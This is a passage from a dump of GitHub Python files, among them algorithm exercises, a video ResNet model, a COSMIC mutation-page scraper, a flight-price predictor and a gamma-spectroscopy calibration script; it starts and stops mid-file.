game_over(dt, screenshot)\r\n\r\n player_collision(dt)\r\n\r\n window.blit(fps_surface, (5, window_height-150))\r\n \r\n pg.display.update()\r\n #END OF GAME LOOP\r\n\r\n\r\npg.quit()\r\n","repo_name":"LuvGautam/Battleship-Game","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":134472,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"38958145939","text":"from collections import deque\n\ndef make_graph(wires, n):\n graph = [[] for i in range(n + 1)]\n\n for wire in wires:\n graph[wire[0]].append(wire[1])\n graph[wire[1]].append(wire[0])\n\n return graph\n\ndef bfs(graph, start, visited):\n queue = deque([start])\n visited[start] = True\n \n list = []\n while queue:\n v = queue.popleft()\n list.append(v)\n\n for i in graph[v]:\n if not visited[i]:\n queue.append(i)\n visited[i] = True\n\n return list\n\ndef solution(n, wires):\n answer = 100\n wires = sorted(wires, key = lambda x : (x[0], x[1]))\n\n for i in range(len(wires)):\n wire = wires[:i] + wires[i+1:]\n graph = make_graph(wire, n)\n \n node = set([])\n for j in range(1, n + 1):\n visited = [False] * (n + 1)\n bfs(graph, j, visited)\n node.add(visited.count(True))\n\n if max(node) - min(node) < answer:\n answer = max(node) - min(node)\n\n return answer\n","repo_name":"YeonsuBaek/algorithm-test","sub_path":"프로그래머스/lv2/86971. 전력망을 둘로 나누기/전력망을 둘로 나누기.py","file_name":"전력망을 둘로 나누기.py","file_ext":"py","file_size_in_byte":1027,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"23973296497","text":"\"\"\"Environment factory class. Given a valid environment name and its constructor args, returns an instantiation of it\n\"\"\"\nimport os\nimport sys\n\nsys.path.append(os.path.dirname(os.path.abspath(__file__)))\n\nfrom environment import Environment\nfrom pendulum import Pendulum\nfrom spring import Spring\nfrom gravity import NObjectGravity\nfrom chaotic_pendulum import ChaoticPendulum\n\n\nclass EnvFactory():\n \"\"\"Return a new Environment\"\"\"\n\n # Map the name of the name of the Environment concrete class by retrieving all its subclasses\n _name_to_env = {cl.__name__: cl for cl in Environment.__subclasses__()}\n\n @staticmethod\n def get_environment(name, **kwargs):\n \"\"\"Return an environment object based on the environment identifier.\n\n Args:\n name (string); name of the class of the concrete Environment.\n **kwargs: args supplied to the constructor of the object of class name. 
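The power-grid record above brute-forces the split by removing each wire and BFS-counting every component from every node. Since n nodes joined by n-1 wires form a tree, cutting one edge always yields exactly two components of sizes s and n-s, so one BFS per wire suffices. A sketch of that shortcut on an illustrative 9-node tree:

from collections import deque

def min_split_difference(n, wires):
    # The wires form a tree, so cutting one edge leaves two components of
    # sizes s and n - s; the answer is the minimum |n - 2s| over all edges.
    graph = [[] for _ in range(n + 1)]
    for a, b in wires:
        graph[a].append(b)
        graph[b].append(a)

    def component_size(start, banned):
        seen, queue = {start}, deque([start])
        while queue:
            v = queue.popleft()
            for w in graph[v]:
                if (v, w) != banned and (w, v) != banned and w not in seen:
                    seen.add(w)
                    queue.append(w)
        return len(seen)

    return min(abs(n - 2 * component_size(a, (a, b))) for a, b in wires)

print(min_split_difference(
    9, [[1, 3], [2, 3], [3, 4], [4, 5], [4, 6], [4, 7], [7, 8], [7, 9]]))  # 3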
\n \n Raises:\n (NameError): if the given environment type is not supported.\n \n Returns:\n (Environment): concrete instantiation of the Environment.\n \"\"\"\n try:\n return EnvFactory._name_to_env[name](**kwargs)\n except KeyError:\n msg = \"%s is not a supported type by Environment.\" % (name)\n msg += \"Available types are: \" + \"\".join(\"%s \" % eef for eef in EnvFactory._name_to_env.keys())\n raise NameError(msg)\n\n\nif __name__ == \"__main__\":\n # EnvFactory test\n env = EnvFactory.get_environment(\"Pendulum\", mass=0.5, length=1, g=10)\n print(type(env))\n\n from matplotlib import pyplot as plt, animation\n import numpy as np\n rolls = env.sample_random_rollouts(number_of_frames=100,\n delta_time=0.1,\n number_of_rollouts=16,\n img_size=32,\n color=False,\n noise_level=0.,\n seed=23)\n fig = plt.figure()\n img = []\n idx = np.random.randint(rolls.shape[0])\n for im in rolls[idx]:\n img.append([plt.imshow(im, animated=True)])\n ani = animation.ArtistAnimation(fig,\n img,\n interval=50,\n blit=True,\n repeat_delay=1000)\n plt.show()","repo_name":"CampusAI/Hamiltonian-Generative-Networks","sub_path":"environments/environment_factory.py","file_name":"environment_factory.py","file_ext":"py","file_size_in_byte":2449,"program_lang":"python","lang":"en","doc_type":"code","stars":31,"dataset":"github-code","pt":"19"} +{"seq_id":"39528280603","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat Oct 6 13:46:30 2018\n\n@author: renatobottermaiolopesrodrigues\n\"\"\"\n\n\ndef solution(A, K):\n\n if len(A) == K:\n return A\n \n count = 0\n while (count < K):\n aux = None\n for i in range(len(A)-1):\n if not aux:\n aux, A[i+1] = A[i+1], A[i]\n else:\n aux, A[i+1] = A[i+1], aux\n A[0] = aux\n count += 1\n return A\n\nsolution([], 3)","repo_name":"RenatoBMLR/Programming_Challenges","sub_path":"Codility/array_rotation.py","file_name":"array_rotation.py","file_ext":"py","file_size_in_byte":481,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"4180214631","text":"import math\nimport torch.nn as nn\nfrom torchvision.models.video.resnet import VideoResNet,BasicBlock,Conv2Plus1D,R2Plus1dStem,Bottleneck\n\n\nclass VideoResNetPlus(VideoResNet):\n def __init__(self, block, conv_makers, layers,\n stem, num_classes=400, width = 64,\n zero_init_residual=False):\n \"\"\"Generic resnet video generator.\n\n Args:\n block (nn.Module): resnet building block\n conv_makers (list(functions)): generator function for each layer\n layers (List[int]): number of blocks per layer\n stem (nn.Module, optional): Resnet stem, if None, defaults to conv-bn-relu. Defaults to None.\n num_classes (int, optional): Dimension of the final FC layer. Defaults to 400.\n zero_init_residual (bool, optional): Zero init bottleneck residual BN. 
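The array_rotation record shifts element-by-element K times, which is O(n*K) and crashes on its own demo call: solution([], 3) skips the empty shifting loop but still executes A[0] = aux, raising IndexError. Slicing gives the same right-rotation in O(n) and tolerates the empty and K >= len(A) cases:

def rotate_right(A, K):
    # O(n) right-rotation by slicing; mutation-free, and safe for the
    # empty-list and K >= len(A) cases (A[-0:] + A[:-0] is just A).
    if not A:
        return A
    K %= len(A)
    return A[-K:] + A[:-K]

print(rotate_right([1, 2, 3, 4, 5], 3))   # [3, 4, 5, 1, 2]
print(rotate_right([], 3))                # []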
Defaults to False.\n \"\"\"\n super(VideoResNet, self).__init__()\n self.inplanes = 64\n\n self.stem = stem()\n\n self.layer1 = self._make_layer(block, conv_makers[0], width, layers[0], stride=1)\n self.layer2 = self._make_layer(block, conv_makers[1], int(width*2), layers[1], stride=2)\n self.layer3 = self._make_layer(block, conv_makers[2], int(width*4), layers[2], stride=2)\n self.layer4 = self._make_layer(block, conv_makers[3], int(width*8), layers[3], stride=2)\n\n self.avgpool = nn.AdaptiveAvgPool3d((1, 1, 1))\n self.fc = nn.Linear(int(width*8), num_classes)\n\n # init weights\n # self._initialize_weights()\n\n if zero_init_residual:\n for m in self.modules():\n if isinstance(m, Bottleneck):\n nn.init.constant_(m.bn3.weight, 0)\n\n\ndef r2plus1d_scaling(num_classes,multiplier=8):\n \"\"\"Constructor for the 18 layer deep R(2+1)D network as in\n https://arxiv.org/abs/1711.11248\n\n Args:\n pretrained (bool): If True, returns a model pre-trained on Kinetics-400\n progress (bool): If True, displays a progress bar of the download to stderr\n\n Returns:\n nn.Module: R(2+1)D-18 network\n \"\"\"\n block = BasicBlock\n conv_makers = [Conv2Plus1D] * 4\n layers = [int(math.floor(multiplier/8))+1] * 4\n stem = R2Plus1dStem\n width = 8*multiplier\n model = VideoResNetPlus(block = block,conv_makers=conv_makers,layers=layers,stem=stem,width = width,num_classes=num_classes)\n return model","repo_name":"CoCoPIE-Group/video-classification-s2-1d","sub_path":"network/scaling_s21d.py","file_name":"scaling_s21d.py","file_ext":"py","file_size_in_byte":2392,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"6944840604","text":"from selenium import webdriver\nfrom selenium.webdriver.common.desired_capabilities import DesiredCapabilities\n\nfrom time import sleep\nfrom bs4 import BeautifulSoup\nimport requests\n\nchrome = webdriver.Remote(\n command_executor='http://localhost:4444/wd/hub',\n desired_capabilities=DesiredCapabilities.CHROME)\n\n\nclass OverViewParser:\n id = None\n url = \"https://cancer.sanger.ac.uk/cosmic/mutation/overview?id=\"\n soup = \"\"\n overview_dict = dict()\n data_available = False\n\n\n def __init__(self, id=\"6261085\"):\n self.id = id\n self.url = self.url+self.id\n end_point = self.url\n chrome.get(end_point)\n sleep(2)\n main_soup = BeautifulSoup(chrome.page_source, 'lxml')\n self.soup = main_soup\n self.check_if_snp()\n self.get_main_dict()\n\n def check_if_snp(self):\n if self.soup:\n try:\n if \"has been flagged as a SNP\" in self.soup.find('p', class_='quote').text:\n self.data_available = False\n except:\n self.data_available = True\n\n def get_main_dict(self):\n if self.data_available:\n field_name = self.chops_main_table_returns_field_name()\n field_value = self.chops_main_table_returns_value()\n\n # This is our main dict\n dict_main_fields = dict(zip(field_name, field_value))\n\n self.overview_dict = self.put_everything_in_main_dict(value=dict_main_fields)\n\n def chops_main_table_returns_field_name(self):\n if self.data_available:\n # chops the main table that occurs on the top of the page. 
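r2plus1d_scaling() derives both depth and width from one multiplier: channels grow linearly, and each stage gains one block per 8x of width. The arithmetic in isolation, confirming that multiplier=8 reproduces the stock R(2+1)D-18 shape:

import math

def scaling_config(multiplier):
    # Reproduces the arithmetic in r2plus1d_scaling above.
    layers = [int(math.floor(multiplier / 8)) + 1] * 4
    width = 8 * multiplier
    return layers, width

for m in (8, 16, 24):
    print(m, scaling_config(m))
# 8  ([2, 2, 2, 2], 64)   -> the stock R(2+1)D-18 configuration
# 16 ([3, 3, 3, 3], 128)
# 24 ([4, 4, 4, 4], 192)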
Very Necessary\n first_entry_table = self.soup.find('dl', class_='inline')\n try:\n # chops up the individual fields like Mutation ID, Gene name, AA mutation etc etc.\n field_name = [link.string for link in first_entry_table.find_all('dt')]\n except Exception as ex:\n raise Exception(\"Internet Connection is Down: Therefore: {}\".format(ex))\n\n return field_name\n\n def chops_main_table_returns_value(self):\n if self.data_available:\n # chops up the individual values like COSM6261085, etc etc\n field_value = []\n first_entry_table = self.soup.find('dl', class_='inline')\n f_value = first_entry_table.find_all('dd')\n\n for fv in f_value:\n tmp_dict = dict()\n if fv.find_all('a'):\n for fv_hrefs in fv.find_all('a'):\n try:\n tester_tag = fv_hrefs.contents[0].strip(' ').replace('\\n', \" \").replace(\" \", \"\")\n tester_link = fv_hrefs['href']\n tmp_dict[tester_tag] = tester_link\n except:\n pass\n field_value.append(tmp_dict)\n else:\n try:\n data = fv.find_all('p')[0].text.replace('\\n', ' ').strip(' ')\n field_value.append(data)\n except:\n data = fv.text.replace('\\n', ' ').strip(' ')\n field_value.append(data)\n\n return field_value\n\n def put_everything_in_main_dict(self, value=None):\n if self.data_available and value:\n main_dict = dict()\n main_dict[self.soup.find('h2').text.replace('COSM', '')] = value\n\n return main_dict\n\n\nclass TissueDistributionParser(OverViewParser):\n tissue_distribution_dict = dict()\n\n def __init__(self, id=\"6261085\"):\n super().__init__(id=id)\n self.set_tissue_distribution_dict()\n\n def set_tissue_distribution_dict(self):\n if self.data_available:\n all_tissues_even_odd = self.soup.find_all('div', class_='section-content')[2].find_all('tr', {\"class\": [\"even\", \"odd\"]})\n tmp_dict = dict()\n for all in all_tissues_even_odd:\n all_tissues = all.find_all('a')\n for tissues in all_tissues:\n link = tissues['href']\n if 'tissue' in link:\n link_name = tissues.contents[0].strip(' ').replace('\\n', \" \").replace(\" \", \"\")\n tmp_dict[link_name] = link\n\n self.tissue_distribution_dict = tmp_dict\n\n\nclass SampleParser(TissueDistributionParser):\n sample_dict = dict()\n\n def __init__(self, id=\"6261085\"):\n super().__init__(id=id)\n self.set_sample_parser_dict()\n\n def set_sample_parser_dict(self):\n if self.data_available:\n field_values = self.chops_sample_table_returns_field_value()\n field_name = self.chop_sample_table_returns_field_name()\n\n dict_sample_fields = {k: field_values[i::len(field_name)] for i, k in enumerate(field_name)}\n\n self.sample_dict = dict_sample_fields\n\n def chops_sample_table_returns_field_value(self):\n if self.data_available:\n # chops up the individual values like CHG-13-09220T, etc etc\n field_value = []\n\n for f_even_odd in self.soup.find_all('div', class_='section-content')[2].find_all('tr', {\"class\": [\"even\", \"odd\"]}):\n f_value = f_even_odd.find_all('td')\n for fv in f_value:\n tmp_dict = dict()\n if fv.find_all('a'):\n for fv_hrefs in fv.find_all('a'):\n try:\n tester_tag = fv_hrefs.contents[0].strip(' ').replace('\\n', \" \").replace(\" \", \"\")\n tester_link = fv_hrefs['href']\n tmp_dict[tester_tag] = tester_link\n except:\n tester_tag = fv_hrefs.contents[0].contents[0].strip(' ').replace('\\n', \" \").replace(\" \", \"\")\n tester_link = fv_hrefs['href']\n tmp_dict[tester_tag] = tester_link\n field_value.append(tmp_dict)\n else:\n try:\n data = fv.find_all('p')[0].text.replace('\\n', ' ').strip(' ')\n field_value.append(data)\n except:\n data = fv.text.replace('\\n', ' ').strip(' ')\n 
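Both overview parsers rely on the same zip-of-definition-list idiom: <dt> tags become keys and <dd> cells become values, with links collapsed to {text: href} dicts. A self-contained sketch on a toy fragment; html.parser stands in for lxml, and the gene name and href are made up:

from bs4 import BeautifulSoup

html = """
<dl class="inline">
  <dt>Mutation ID</dt><dd>COSM6261085</dd>
  <dt>Gene name</dt><dd><a href="/gene/EXAMPLE">EXAMPLE</a></dd>
</dl>"""

soup = BeautifulSoup(html, "html.parser")
names = [dt.string for dt in soup.find_all("dt")]
values = []
for dd in soup.find_all("dd"):
    links = dd.find_all("a")
    # Link cells become {text: href} dicts, plain cells become stripped text.
    values.append({a.text: a["href"] for a in links} if links else dd.text.strip())
print(dict(zip(names, values)))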
field_value.append(data)\n\n\n return field_value\n\n def chop_sample_table_returns_field_name(self):\n if self.data_available:\n # chops up the individual values like SAMPLE NAME, GENE NAME, etc etc\n field_name = []\n f_name = self.soup.find_all('div', class_='section-content')[2].find('tr').find_all('th')\n\n for fn in f_name:\n name = fn.contents[0].strip(' ').replace('\\n', \" \").replace(\" \", \"\")\n field_name.append(name)\n\n return field_name\n\n\nclass ReferenceParser(SampleParser):\n reference_dict = dict()\n\n def __init__(self, id=\"6261085\"):\n super().__init__(id=id)\n self.set_reference_parser_dict()\n\n def set_reference_parser_dict(self):\n if self.data_available:\n field_values = self.chops_reference_table_returns_field_value()\n field_name = self.chop_reference_table_returns_field_name()\n\n dict_reference_fields = {k: field_values[i::len(field_name)] for i, k in enumerate(field_name)}\n\n self.reference_dict = dict_reference_fields\n\n def chops_reference_table_returns_field_value(self):\n if self.data_available:\n # chops up the individual values like CHG-13-09220T, etc etc\n field_value = []\n\n for f_even_odd in self.soup.find_all('div', class_='section-content')[2].find_all('tr', {\"class\": [\"even\", \"odd\"]}):\n f_value = f_even_odd.find_all('td')\n for fv in f_value:\n tmp_dict = dict()\n if fv.find_all('a'):\n for fv_hrefs in fv.find_all('a'):\n try:\n tester_tag = fv_hrefs.contents[0].strip(' ').replace('\\n', \" \").replace(\" \", \"\")\n tester_link = fv_hrefs['href']\n tmp_dict[tester_tag] = tester_link\n except:\n tester_tag = fv_hrefs.contents[0].contents[0].strip(' ').replace('\\n', \" \").replace(\" \", \"\")\n tester_link = fv_hrefs['href']\n tmp_dict[tester_tag] = tester_link\n field_value.append(tmp_dict)\n else:\n try:\n data = fv.find_all('p')[0].text.replace('\\n', ' ').strip(' ')\n field_value.append(data)\n except:\n data = fv.text.replace('\\n', ' ').strip(' ')\n field_value.append(data)\n\n return field_value\n\n def chop_reference_table_returns_field_name(self):\n if self.data_available:\n # chops up the individual values like SAMPLE NAME, GENE NAME, etc etc\n field_name = []\n f_name = self.soup.find_all('div', class_='section-content')[3].find('tr').find_all('th')\n\n for fn in f_name:\n name = fn.contents[0].strip(' ').replace('\\n', \" \").replace(\" \", \"\")\n field_name.append(name)\n\n return field_name\n\n\nclass Parser(ReferenceParser):\n main_dict = dict()\n\n def __init__(self, id=\"6261085\"):\n super().__init__(id=id)\n self.main_dict['OverView'] = self.overview_dict\n self.main_dict['Tissue'] = self.tissue_distribution_dict\n self.main_dict['Sample'] = self.sample_dict\n self.main_dict['Reference'] = self.reference_dict\n\n\n# p = Chopper(id=str(4745787))\n# if p:\n# pass\n","repo_name":"kanzabatool/Grad_project","sub_path":"Automatically_annotating_cancervariants_using_publicdatabases/gene_parser.py","file_name":"gene_parser.py","file_ext":"py","file_size_in_byte":9991,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"41373986608","text":"import pickle\nimport json\nimport numpy as np\nimport pandas as pd\n\n__data_columns = None\n__model = None\n__airlines=None\n__sources=None\n__stop_details=None\n__destinations=None\ndata=None\n\ndef get_source_names():\n return __sources\n\ndef get_destination_names():\n return __destinations\n\ndef get_stop_details():\n return __stop_details\n\ndef get_airline_names():\n return __airlines\n\ndef get_data():\n print(data)\n 
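SampleParser and ReferenceParser rebuild table columns from a flat, row-major cell list by slicing with a stride equal to the column count, which is worth seeing in isolation. (Note, too, that chops_reference_table_returns_field_value reads section-content[2], the sample table, while its header counterpart reads [3]; that looks like a copy-paste leftover.)

# De-interleave a flat row-major cell list into per-column lists, exactly
# as set_sample_parser_dict() does with field_values[i::len(field_name)].
field_name = ['SAMPLE', 'GENE', 'TISSUE']
field_values = ['s1', 'g1', 't1', 's2', 'g2', 't2']

columns = {k: field_values[i::len(field_name)] for i, k in enumerate(field_name)}
print(columns)
# {'SAMPLE': ['s1', 's2'], 'GENE': ['g1', 'g2'], 'TISSUE': ['t1', 't2']}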
return data\n\ndef get_estimated_price(Airline,Source,Destination,Departure,Arrival,Stops):\n try:\n airline_index= __data_columns.index(\"airline_\" + Airline.lower())\n except:\n airline_index=-1\n try: \n source_index= __data_columns.index(\"source_\" + Source.lower())\n except:\n source_index=-1\n try:\n destination_index=__data_columns.index(\"destination_\" + Destination.lower())\n except:\n destination_index=-1\n\n \n\n x=np.zeros(len(__data_columns))\n\n x[0]= __stop_details.get(Stops.lower())\n x[1]= int(pd.to_datetime(Departure, format=\"%Y-%m-%dT%H:%M\").day)\n x[2]= int(pd.to_datetime(Departure, format =\"%Y-%m-%dT%H:%M\").month)\n x[3]= int(pd.to_datetime(Departure, format =\"%Y-%m-%dT%H:%M\").hour)\n x[4]= int(pd.to_datetime(Departure, format =\"%Y-%m-%dT%H:%M\").minute)\n\n x[5]= int(pd.to_datetime(Arrival, format =\"%Y-%m-%dT%H:%M\").hour)\n x[6]= int(pd.to_datetime(Arrival, format =\"%Y-%m-%dT%H:%M\").minute)\n\n x[7]= abs(x[3]-x[5])\n x[8]= abs(x[4]-x[6])\n\n\n if airline_index>=0:\n x[airline_index]=1\n if source_index>=0:\n x[source_index]=1\n if destination_index>=0:\n x[destination_index]=1\n\n \n return round(__model.predict([x])[0],2)\n\ndef load_saved_artifacts():\n global __data_columns\n global __airlines\n global __model\n global __sources\n global __destinations\n global __stop_details\n global data\n\n with open(\"./artifacts/artifacts.json\", 'r') as j:\n data= json.loads(j.read())\n __airlines = data['airlines']\n __sources= data['sources']\n __destinations= data['destinations']\n __data_columns= data['data_columns']\n __stop_details= data.get('stop_details')\n\n with open(\"./artifacts/flight_rf.pkl\",'rb') as f:\n __model = pickle.load(f)\n \n \n\n\n# if __name__ == '__main__':\n# load_saved_artifacts()\n# print()\n# print()\n# print(data)","repo_name":"tatanaidun/FlaskAPI_forPREVEL","sub_path":"util.py","file_name":"util.py","file_ext":"py","file_size_in_byte":2368,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"19"} +{"seq_id":"39883212816","text":"#! 
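get_estimated_price() encodes its categorical inputs by locating the matching airline_*/source_*/destination_* columns and flipping those positions to 1; an unseen category simply leaves its block at zero. The same encoding on a made-up column list:

import numpy as np

data_columns = ['stops', 'day', 'month', 'airline_indigo', 'airline_air india',
                'source_delhi', 'source_kolkata', 'destination_cochin']

def one_hot_row(airline, source, destination):
    x = np.zeros(len(data_columns))
    for prefix, value in (('airline_', airline), ('source_', source),
                          ('destination_', destination)):
        try:
            x[data_columns.index(prefix + value.lower())] = 1
        except ValueError:   # unseen category -> all-zero block, as above
            pass
    return x

print(one_hot_row('IndiGo', 'Delhi', 'Cochin'))   # ones at indices 3, 5, 7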
/usr/bin/python3\n\nimport VisTools.plotting as vtp\nimport matplotlib.pyplot as plt\nimport matplotlib.ticker as tck\nimport pandas as pd\nfrom scipy.interpolate import spline\nimport numpy as np\nimport uncertainties as unc\nimport uncertainties.unumpy as unp\n\ncollected_data = pd.DataFrame()\n\nvalues = {\n \"co60\": {\n \"name\": \"$^{60}$Co\",\n \"marked_ch\": [76, 196, 708, 927, 1047],\n \"marked_ch_err\": [5, 10, 30, 20, 10, 10],\n \"energy_theo\": [1.17323, 1.33248],\n \"fitting_interval\": [[870, 990], [990, 1150]],\n \"timeframe\": 735\n },\n \"cs137\": {\n \"name\": \"$^{137}$Cs\",\n \"marked_ch\": [78, 171, 370, 543],\n \"marked_ch_err\": [5, 10, 15, 10],\n \"energy_theo\": [0.6616],\n \"fitting_interval\": [[480, 700]],\n \"timeframe\": 290\n },\n \"mn54\": {\n \"name\": \"$^{54}$Mn\",\n \"marked_ch\": [14, 75, 178, 497, 678],\n \"marked_ch_err\": [2, 5, 10, 15, 10],\n \"energy_theo\": [0.8353],\n \"fitting_interval\": [[600, 800]],\n \"timeframe\": 298\n },\n \"ba133\": {\n \"name\": \"$^{133}$Ba\",\n \"marked_ch\": [78, 102, 144, 257, 308],\n \"marked_ch_err\": [5, 10, 10, 10, 10],\n \"energy_theo\": [0.356],\n \"fitting_interval\": [[275, 400]],\n \"timeframe\": 282\n },\n \"na22\": {\n \"name\": \"$^{22}$Na\",\n \"marked_ch\": [76, 162, 420, 804, 1005],\n \"marked_ch_err\": [5, 20, 10, 15, 15, 20],\n \"energy_theo\": [1.2746],\n \"fitting_interval\": [[900, 1100]],\n \"timeframe\": 316\n }\n}\n\ndistr = lambda x, m, gamma, intens: intens*(gamma**2/((x-m)**2+gamma**2))\n\n###############################################################################\n# plotting for intensity\nfor f in values.keys():\n\n depth = len(values[f][\"fitting_interval\"])\n\n plt.cla()\n data = pd.read_table(\"data/\" + f + \"_int\", header=None, decimal=',').transpose()\n\n data.columns = [f + \"_int\"]\n\n # add read values into collected_data\n collected_data = pd.concat([collected_data, data], axis=1)\n\n values[f][\"peak_params\"] = []\n\n # calculating right xlimit\n for i, v in enumerate(reversed(data[f + \"_int\"][:2000])):\n if v > 100:\n values[f][\"xlim_r\"] = len(data[f + \"_int\"])-i-1\n #print(xlim2, v)\n break\n #plt.xlim([0, xlim2*1.1])\n\n # fitting the photopeaks\n for i, interv in enumerate(values[f][\"fitting_interval\"]):\n x_data = np.arange(interv[0],interv[1])\n\n p0 = [\n values[f][\"marked_ch\"][-depth+i],\n 70,\n data[f + \"_int\"][values[f][\"marked_ch\"][-depth+i]]\n ]\n\n fparams = vtp.fit(\n x_data,\n data[f + \"_int\"][interv[0]:interv[1]],\n distr,\n p0,\n [10]*len(x_data)\n )\n\n # extrapolation by eye (bc of energy_resolution fit)\n if f == \"co60\":\n if i == 1:\n fparams[1]*=.87\n if i == 0:\n fparams[1]*=.79\n\n ## replace the old estimations with the fitted peak positions\n values[f][\"marked_ch\"][-depth+i] = fparams[0].n\n values[f][\"marked_ch_err\"][-depth+i] += fparams[0].s\n values[f][\"marked_ch_err\"][-depth+i] = values[f][\"marked_ch_err\"][-depth+i]/2\n\n\n values[f][\"peak_params\"].append([*fparams])\n #print(*unp.nominal_values([*fparams]))\n\n# add underground to dataset\ndata = pd.read_table(\"data/\" + f + \"_int\", header=None, decimal=',').transpose()\ndata.columns = [\"underground_int\"]\n\n# add read values into collected_data\ncollected_data = pd.concat([collected_data, data], axis=1)\n\n# fitting the calibration\nlist_en = []\nlist_ch = []\nfor e in values.keys():\n for i, v in enumerate(values[e][\"energy_theo\"]):\n depth = len(values[e][\"energy_theo\"])\n\n list_en.append(v)\n 
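spektra.py fits every photopeak with the Lorentzian distr(x, m, gamma, intens) through the project-specific VisTools.plotting.fit helper. The stock equivalent with scipy.optimize.curve_fit, on synthetic data shaped like one of the peak windows:

import numpy as np
from scipy.optimize import curve_fit

def lorentzian(x, m, gamma, intensity):
    # Same peak model as `distr` above: height `intensity` at x = m, HWHM gamma.
    return intensity * gamma**2 / ((x - m)**2 + gamma**2)

rng = np.random.default_rng(0)
x = np.linspace(900, 1100, 200)
y = lorentzian(x, 1005, 25, 800) + rng.normal(0, 10, x.size)

# curve_fit returns best-fit parameters and their covariance matrix;
# the diagonal gives the 1-sigma parameter errors.
popt, pcov = curve_fit(lorentzian, x, y, p0=[1000, 20, 700])
print(popt, np.sqrt(np.diag(pcov)))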
list_ch.append(values[e][\"marked_ch\"][-depth+i])\n\n\nfit_en_m, fit_en_c = vtp.fit_linear(\n list_ch,\n list_en,\n [\n 1/1000,\n 0\n ],\n None\n)\n\n\n###############################################################################\n# calibration plot\n## figure setup\nfig = plt.figure(figsize=(11.7,8.3))\nplt.style.use('bmh')\nplt.minorticks_on()\nplt.grid(b=True, which=\"minor\", color=\"#cccccc\")\n\n## plotting the fitted linear curve\ncalib_xdata = np.array([200, 1100])\nplt.plot(\n calib_xdata,\n calib_xdata*fit_en_m.n+fit_en_c.n,\n label=\"linear fit\",\n color=\"#c0c0c0\"\n)\n\n## plotting the used points\nfor e in values.keys():\n for i, v in enumerate(values[e][\"energy_theo\"]):\n depth = len(values[e][\"energy_theo\"])\n plt.errorbar(\n values[e][\"marked_ch\"][-depth +i],\n v,\n xerr=values[e][\"marked_ch_err\"][-depth+i],\n label=(values[e][\"name\"] + \" \" + str(i+1)) if e == \"co60\" else values[e][\"name\"],\n zorder=2,\n elinewidth=1,\n fmt=\".\",\n ms=4\n )\n\n## add the curve parameters to plot\nplt.annotate(\n \"Energy = Channel $\\cdot$ m + c\\n\\nm = $({:.3fL})$ keV\\nc = $({:.3fL})$ keV\"\n .format(fit_en_m*1000, fit_en_c*1000),\n xy=(800, 0.6),\n xycoords='data',\n xytext=(0, 0),\n textcoords='offset points',\n fontsize=14,\n bbox=dict(\n boxstyle=\"round\",\n fc=\"1\"\n )\n)\n\n## plot meta\nplt.legend()\nplt.xlabel(\"channel\")\nplt.ylabel(\"Energy / MeV\")\nplt.title(\"Calibration Fit, Channel vs. Energy\")\nplt.savefig(\"energy_calibration.png\")\n\n\n###############################################################################\n# underground plot\n\nplt.clf()\nplt.plot(\n np.array(collected_data.index.values.tolist()) * fit_en_m.n + fit_en_c.n,\n collected_data[\"underground_int\"]\n)\n\nplt.xlim([0,1.5])\nplt.ylim([-100,2500])\nplt.xlabel(\"Energy / MeV\")\nplt.ylabel(\"Intensity\")\nplt.savefig(\"int_underground.png\")\n\n\n###############################################################################\n# plot Energyresolution\nplt.cla()\nlims = [.2, 1.5]\nfitlims = [.3, 1.5]\n\nplt.xlim(lims)\n\nfitpointsx = np.array([])\nfitpointsy = np.array([])\n\nfor e in values.keys():\n for i, v in enumerate(values[e]['energy_theo']):\n depth = len(values[e][\"energy_theo\"])\n plt.errorbar(\n (values[e][\"marked_ch\"][-depth +i]*fit_en_m+fit_en_c).n,\n (values[e][\"peak_params\"][i][1]*2*fit_en_m).n,\n xerr=(values[e][\"marked_ch\"][-depth +i]*fit_en_m+fit_en_c).s,\n yerr=(values[e][\"peak_params\"][i][1]*2*fit_en_m).s,\n label= (values[e][\"name\"] + \" \" + str(i+1)) if e == \"co60\" else values[e][\"name\"],\n zorder=2,\n elinewidth=1,\n fmt=\".\",\n ms=4\n )\n\n fitpointsx = np.append(fitpointsx,np.array([values[e][\"marked_ch\"][-depth +i]*fit_en_m.n+fit_en_c.n]))\n fitpointsy = np.append(fitpointsy,np.array([values[e][\"peak_params\"][i][1].n*2*fit_en_m.n]))\n #print(e, i, -depth+i, values[e][\"peak_params\"][-depth +i][1].n)\n\nef = lambda x, intensity, w, c: c + np.exp(x/w) * intensity\n\nfparams = vtp.fit(\n fitpointsx,\n fitpointsy,\n ef,\n [\n 1,\n 1,\n 0\n ],\n None\n)\n\nfx_data = np.arange(*fitlims, .1)\n\nplt.plot(\n fx_data,\n ef(fx_data, *unp.nominal_values(fparams)),\n label=\"exp. 
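The calibration fit yields fit_en_m and fit_en_c as uncertainties ufloats, so channel * m + c propagates errors automatically and formats straight into the {:.3fL} LaTeX placeholders used throughout. A standalone example with illustrative fitted values:

import uncertainties as unc

fit_en_m = unc.ufloat(1.29e-3, 0.02e-3)   # MeV / channel (illustrative)
fit_en_c = unc.ufloat(-0.012, 0.005)      # MeV          (illustrative)

energy = 927 * fit_en_m + fit_en_c        # ufloat with propagated error
print('E = {:.3fL} MeV'.format(energy))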
